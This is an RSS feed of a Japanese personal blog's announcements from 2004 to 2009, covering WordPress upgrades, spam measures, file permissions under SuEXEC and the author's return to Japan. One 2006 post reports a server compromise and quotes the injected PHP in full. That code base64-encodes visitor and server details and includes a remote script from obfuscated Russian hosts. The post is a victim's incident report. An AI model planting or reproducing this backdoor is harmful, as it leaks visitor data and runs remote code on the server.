<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Rhein-strasse &#187; お知らせ</title>
	<atom:link href="http://www.rhein-strasse.de/categorias/announce/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rhein-strasse.de</link>
	<description>ライン川のほとりから…</description>
	<lastBuildDate>Mon, 12 Oct 2009 03:16:15 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>日本に戻りました</title>
		<link>http://www.rhein-strasse.de/blog/2009/09/07/back-to-japan/</link>
		<comments>http://www.rhein-strasse.de/blog/2009/09/07/back-to-japan/#comments</comments>
		<pubDate>Tue, 08 Sep 2009 06:50:35 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/?p=730</guid>
		<description><![CDATA[この度、アメリカへの赴任が解かれて、日本に戻ってきました。
ドイツに6年、アメリカに2年。 合計 8年間の海外生活が終わりました。
また海外に出る事になるかもしれませんが、しばらくは日本でゆっくりしたいと思います。
]]></description>
			<content:encoded><![CDATA[<p>この度、アメリカへの赴任が解かれて、日本に戻ってきました。<br />
ドイツに6年、アメリカに2年。 合計 8年間の海外生活が終わりました。</p>
<p>また海外に出る事になるかもしれませんが、しばらくは日本でゆっくりしたいと思います。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2009/09/07/back-to-japan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2009年</title>
		<link>http://www.rhein-strasse.de/blog/2009/01/04/2009newyear/</link>
		<comments>http://www.rhein-strasse.de/blog/2009/01/04/2009newyear/#comments</comments>
		<pubDate>Mon, 05 Jan 2009 01:04:09 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/?p=662</guid>
		<description><![CDATA[あけましておめでとうございます。
去年の夏から放置していますが、年も明けましたので一応一言。
記事を書くついでに、WordPress 2.7 に更新しました。
管理画面が一新されて使いやすくなっています。
それでは、本年 [...]]]></description>
			<content:encoded><![CDATA[<p>あけましておめでとうございます。<br />
去年の夏から放置していますが、年も明けましたので一応一言。</p>
<p>記事を書くついでに、<a href="http://ja.wordpress.org/">WordPress</a> 2.7 に更新しました。<br />
管理画面が一新されて使いやすくなっています。</p>
<p>それでは、本年もどうぞよろしくお願いいたします。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2009/01/04/2009newyear/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>トップページを簡略化</title>
		<link>http://www.rhein-strasse.de/blog/2008/08/02/light-top-page/</link>
		<comments>http://www.rhein-strasse.de/blog/2008/08/02/light-top-page/#comments</comments>
		<pubDate>Sat, 02 Aug 2008 22:36:28 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/?p=641</guid>
		<description><![CDATA[最近、Blog 記事をあまり上げてないので、最新記事をトップに表示するのをやめて軽くしてみました。
こういうカスタマイズができるのも、WordPress の魅力ですね。
]]></description>
			<content:encoded><![CDATA[<p>最近、Blog 記事をあまり上げてないので、最新記事をトップに表示するのをやめて軽くしてみました。<br />
こういうカスタマイズができるのも、<a href="http://ja.wordpress.org/">WordPress</a> の魅力ですね。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2008/08/02/light-top-page/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>メール送信フォーム不具合について</title>
		<link>http://www.rhein-strasse.de/blog/2007/08/11/mailform/</link>
		<comments>http://www.rhein-strasse.de/blog/2007/08/11/mailform/#comments</comments>
		<pubDate>Sun, 12 Aug 2007 01:29:44 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2007/08/11/mailform/</guid>
		<description><![CDATA[当サイトに設置しておりますメール送信フォームが、2007年4月頃から正常動作していませんでしたので、修正を行いました。
bot による spam 送信が頻発したため対策を入れたのですが、この判定条件が厳しすぎてほとんど全 [...]]]></description>
			<content:encoded><![CDATA[<p>当サイトに設置しておりますメール送信フォームが、2007年4月頃から正常動作していませんでしたので、修正を行いました。<br />
bot による spam 送信が頻発したため対策を入れたのですが、この判定条件が厳しすぎてほとんど全てのメールが spam 判定され拒否されていました。</p>
<p>メール送信フォームを使用して連絡いただいたにもかかわらず、返事がない場合にはお手数ですが再度ご連絡ください。<br />
ちなみに、botを欺くため spam 判定された場合は &#8220;Thank you for your comment!&#8221; と英語で表示されます。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2007/08/11/mailform/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SuEXEC が導入されました</title>
		<link>http://www.rhein-strasse.de/blog/2006/08/06/suexec/</link>
		<comments>http://www.rhein-strasse.de/blog/2006/08/06/suexec/#comments</comments>
		<pubDate>Sun, 06 Aug 2006 10:30:05 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2006/08/06/suexec/</guid>
		<description><![CDATA[先日の Webサイト攻撃事件 を受け、プロバイダ側で CGI, PHP の設定変更が行われ、SuEXEC というシステムが導入されました。
SuEXEC については、suEXEC サポート &#8211; Apache  [...]]]></description>
			<content:encoded><![CDATA[<p>先日の <a href="http://www.rhein-strasse.de/blog/2006/07/26/site-hacked/">Webサイト攻撃事件</a> を受け、プロバイダ側で CGI, PHP の設定変更が行われ、SuEXEC というシステムが導入されました。</p>
<p>SuEXEC については、<a href="http://httpd.apache.org/docs/2.0/ja/suexec.html">suEXEC サポート &#8211; Apache HTTP サーバ</a> に詳細情報が掲載されていますが、こちらの記事はサーバ管理者向けのものですので、一般ユーザが注意すべきことは、<a href="http://www.kent-web.com/">KENT WEB さん</a> の FAQ <a href="http://www.kent-web.com/support/faq/faq3-2.html">suExec環境、CGIWrap環境って何ですか?</a> のほうにわかりやすくまとめられています。<br />
<span id="more-565"></span><br />
今後 CGI を設置する場合は、添付の説明書に書かれているパーミッション設定を以下のように読み替える必要があります。</p>
<p>CGI ファイル (*.cgi, *.pl など [注]): 755 or 705 → 701<br />
ログファイル/データファイル:  666 or 606 → 600<br />
読み込み専用ファイル: 644 or 604 → 600<br />
ファイル生成ディレクトリ（ロック/ログ用など）: 777 or 707 → 701<br />
CGI ファイルを設置したディレクトリ: 755 → 755 （変更無し）</p>
<p>注: KENT WEBさんで配布されている CGI は、ログやデータファイルに .cgi という拡張子をつけて、Web から参照できないようにするという方法が取られています。 この場合のパーミッション設定は、ログファイル/データファイルの項目にあわせる必要があります。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2006/08/06/suexec/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web サイトが攻撃を受けました</title>
		<link>http://www.rhein-strasse.de/blog/2006/07/26/site-hacked/</link>
		<comments>http://www.rhein-strasse.de/blog/2006/07/26/site-hacked/#comments</comments>
		<pubDate>Wed, 26 Jul 2006 19:05:39 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2006/07/26/site-hacked/</guid>
		<description><![CDATA[7月21日 12:13EST 頃、本ブログを置いている Web サーバが攻撃を受け、第三者への書き込みを許可していたディレクトリに不正な PHP ファイルが書き込まれていました…]]></description>
			<content:encoded><![CDATA[<p>7月21日 12:13EST 頃、本ブログを置いている Web サーバが攻撃を受け、第三者への書き込みを許可していたディレクトリに不正な PHP ファイルが書き込まれていました。 現在公開している WordPress のブログ関連ファイルが改竄された形跡はありませんでしたが、画像のアップロード用にしていたディレクトリに不正なファイルがいくつか残っていました。（ディレクトリインデックス表示を不許可としていたため、問題の PHP ファイルにアクセスされることはありませんでした。） 発見した不正な PHP ファイルは既に削除済みです。</p>
<p>また、以前使用していた MovableType のアーカイブディレクトリをパーミッション 777 のまま放置していたため、中の PHP, html ファイルが改竄されていました。 こちらは既に使用していないので、ディレクトリごと削除いたしました。<br />
<span id="more-564"></span><br />
【改竄内容】<br />
攻撃者により改竄が行われた内容は、以下の 4通りです。 複数のディレクトリ／ファイルに渡って攻撃が行われました。</p>
<p>1. Others に対して書き込み権限を与えてあるディレクトリに、<strong>include_once()</strong> の http ハンドラを使用してロシアのサイトに接続するよう記述された php ファイルを作成する。（ファイル名はいくつかのパターンがありますが、system.php config.php など、他の PHP ファイルに紛れ込むようなファイル名が付けられています）</p>
<p>2. Others に対して書き込み権限を与えてあるディレクトリに、<strong>.htaccess</strong> を作成し、1 で設置されたファイルに誘導しようとする。</p>
<p>3. Others に対して書き込み権限を与えてある、既存の拡張子が .php のファイルに対して、1 と同様の内容を追記する。</p>
<p>4. Others に対して書き込み権限を与えてある、既存の拡張子が .html .htm のファイルに対して、外部参照 JavaScript でロシアのサイトに接続するよう追記する。</p>
<p>【コードサンプル】<br />
1. 3. において、PHP ファイルに書き込まれたコードの例です。 ロシアのサイトに接続し、サーバ名、攻撃コードが仕掛けられた URL、アクセス時のパラメータ、参照元、アクセスした人の IP アドレスがロシアのサイトに送信されます。</p>
<blockquote><p>
error_reporting(0);<br />
$s=&#8221;e&#8221;;$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);<br />
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);<br />
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);<br />
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);<br />
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"]<br />
 : $QUERY_STRING);<br />
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"]<br />
 : $HTTP_REFERER);<br />
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"]<br />
 : $HTTP_USER_AGENT);<br />
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);<br />
$str=base64_encode($a).&#8221;.&#8221;.base64_encode($b).&#8221;.&#8221;.base64_encode($c)<br />
.&#8221;.&#8221;.base64_encode($d).&#8221;.&#8221;.base64_encode($e).&#8221;.&#8221;.base64_encode($f).&#8221;.&#8221;<br />
.base64_encode($g).&#8221;.&#8221;.base64_encode($h).&#8221;.$s&#8221;;<br />
if ((include(base64_decode(&#8220;aHR0cDovLw==&#8221;)<br />
.base64_decode(&#8220;dXNlcjkubXNodG1sLnJ1&#8243;).&#8221;/?&#8221;.$str))){} else {<br />
inc lude(base64_decode(&#8220;aHR0cDovLw==&#8221;)<br />
.base64_decode(&#8220;dXNlcjcuaHRtbHRhZ3MucnU=&#8221;).&#8221;/?&#8221;.$str);}</p></blockquote>
<p>エンコードされた文字列で検索すると、複数箇所で被害が出ていることを確認できました。</p>
<p>【調査状況】<br />
プロバイダのスタッフに、アクセスログの検証作業を行っていただきましたが、rhein-strasse.de ドメインへのアクセス記録からは不審なアクセスは見つかりませんでした。 同じサーバを使用している（このサイトは、共有サーバのバーチャルドメイン運用です）他のユーザからも同様の報告があったとの事でしたので、現在サーバ全体のログファイルを調査中していただいております。</p>
<p>【対応状況：追記1】<br />
18:00CEST 頃、サーバはメンテナンス中のため断続的に接続できない事があるとのアナウンスが出ていました。</p>
<p>【対応状況：追記2】<br />
21:00CEST 現在、サーバの PHP が、モジュールモードから CGI モードに変更されています。 プロバイダからは、引き続き対応中とのコメントしか出ていませんが。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2006/07/26/site-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.0.1 にバージョンアップ</title>
		<link>http://www.rhein-strasse.de/blog/2006/02/08/wp201/</link>
		<comments>http://www.rhein-strasse.de/blog/2006/02/08/wp201/#comments</comments>
		<pubDate>Wed, 08 Feb 2006 20:02:36 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2006/02/08/wp201/</guid>
		<description><![CDATA[このサイトで使用している Blog ソフトウェア、WordPress のバージョンアップを行いました。 これは、バージョン 2.0.1 です。
配色が大幅に変わっているのは、テンプレートを標準の物に戻したからです。 今ま [...]]]></description>
			<content:encoded><![CDATA[<p>このサイトで使用している Blog ソフトウェア、<a href="http://wordpress.org/">WordPress</a> のバージョンアップを行いました。 これは、バージョン <strong>2.0.1</strong> です。<br />
配色が大幅に変わっているのは、テンプレートを標準の物に戻したからです。 今まで使用していたテンプレートは、MT で使用していた物を WordPress 1.2 用に書き換え、その後も手直しをしつつ使い続けていた物でしたが、一部のレイアウトが崩れていたので一旦破棄しました。</p>
<p>なお、今回は日本語リソースを導入せずに、英語版のまま使用しています。</p>
<p><span id="more-537"></span></p>
<p><em>大きな変更点</em></p>
<ul>
<li>これを書いている編集ウィンドウが、リッチテキストエディッタ（？）に変更された。 なお、設定により従来のスタイルも使用可能。</li>
<li>編集画面の下にあるプレビュー画面が、テンプレートを反映した物になった。</li>
</ul>
<p><em>今後の課題</em></p>
<ul>
<li>Accept-Language ヘッダをチェックして、システムの言語設定を切り替えられるようにする。 （以前は、仮対応を行っていたが、判定方法に問題があったため現在は無効にしている。）</li>
<li>テンプレート中の言語も上記設定により、切り替えられるようにする。（WordPress ME で対応しているので参考にさせていただく。）</li>
<li>WordPress 管理外のデータを統合する。（ページ機能を使えば対応可能の見込み。）</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2006/02/08/wp201/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 1.5 に更新</title>
		<link>http://www.rhein-strasse.de/blog/2005/03/12/wp15/</link>
		<comments>http://www.rhein-strasse.de/blog/2005/03/12/wp15/#comments</comments>
		<pubDate>Sat, 12 Mar 2005 17:50:29 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2005/03/12/wp15/</guid>
		<description><![CDATA[WordPress ME 1.2.3 から WordPress 1.5 へバージョンアップしました。
テンプレート関連が大幅に変更されているのですが、スタイルシートを書き直すのが面倒なので前のバージョンの物を適用していま [...]]]></description>
			<content:encoded><![CDATA[<p>WordPress ME 1.2.3 から WordPress 1.5 へバージョンアップしました。<br />
テンプレート関連が大幅に変更されているのですが、スタイルシートを書き直すのが面倒なので前のバージョンの物を適用しています。(^^;</p>
<p>コメント/トラックバックは、新機能のブラックワード/グレーワード判定機能（勝手に命名）でどれくらい弾けるかをテストするため、以前行っていた spam 対策は一旦外しています。 バージョンアップ時に面倒だったから、そのまま上書きしたという話も。(^^;;;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2005/03/12/wp15/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>コメント／トラックバック機能の設定を変更しました</title>
		<link>http://www.rhein-strasse.de/blog/2005/01/10/comment-policy/</link>
		<comments>http://www.rhein-strasse.de/blog/2005/01/10/comment-policy/#comments</comments>
		<pubDate>Mon, 10 Jan 2005 19:20:46 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2005/01/10/comment-policy/</guid>
		<description><![CDATA[1. コメントを書き込む際、メールアドレスの入力は省略可能としました。
2. 全てのコメントとトラックバックは、私がチェックを行ってから公開されるように変更しました。
2 については、一時的な spam 対策です。 より [...]]]></description>
			<content:encoded><![CDATA[<p>1. コメントを書き込む際、メールアドレスの入力は省略可能としました。<br />
2. 全てのコメントとトラックバックは、私がチェックを行ってから公開されるように変更しました。</p>
<p>2 については、一時的な spam 対策です。 よりよい対策方法が見つかりましたら、これを解除する予定です。</p>
<p>また、コメント／トラックバック機能とは無関係ですが、html の gzip 圧縮機能を有効にしました。 対応ブラウザでは、ページ表示にかかる時間が若干短くなったと思います。 MovableType から移行する際に、有効化を忘れていました。(^^;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2005/01/10/comment-policy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>気休め spam 対策</title>
		<link>http://www.rhein-strasse.de/blog/2004/12/16/force-wp-spam/</link>
		<comments>http://www.rhein-strasse.de/blog/2004/12/16/force-wp-spam/#comments</comments>
		<pubDate>Thu, 16 Dec 2004 22:45:50 +0000</pubDate>
		<dc:creator>Fuku-nyan</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[お知らせ]]></category>

		<guid isPermaLink="false">http://www.rhein-strasse.de/blog/2004/12/16/force-wp-spam/</guid>
		<description><![CDATA[そういえば、書き忘れてた。
コメントを投稿する際には、『このコメントは広告目的ではありません。』ってところに、チェックを入れてやってください。
WordPress Japan Wiki:スパムコメント対策 の コメント投 [...]]]></description>
			<content:encoded><![CDATA[<p>そういえば、書き忘れてた。</p>
<p>コメントを投稿する際には、『このコメントは広告目的ではありません。』ってところに、チェックを入れてやってください。</p>
<p>WordPress Japan Wiki:<a href="http://wordpress.xwd.jp/wiki/index.php?%A5%B9%A5%D1%A5%E0%A5%B3%A5%E1%A5%F3%A5%C8%C2%D0%BA%F6">スパムコメント対策</a> の <em>コメント投稿時にチェック必須にする : (効果体感度90%)</em> を、一部アレンジして適用させていただきました。</p>
<p>＃WP は 複数カテゴリの設定が楽でいいなぁ。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rhein-strasse.de/blog/2004/12/16/force-wp-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
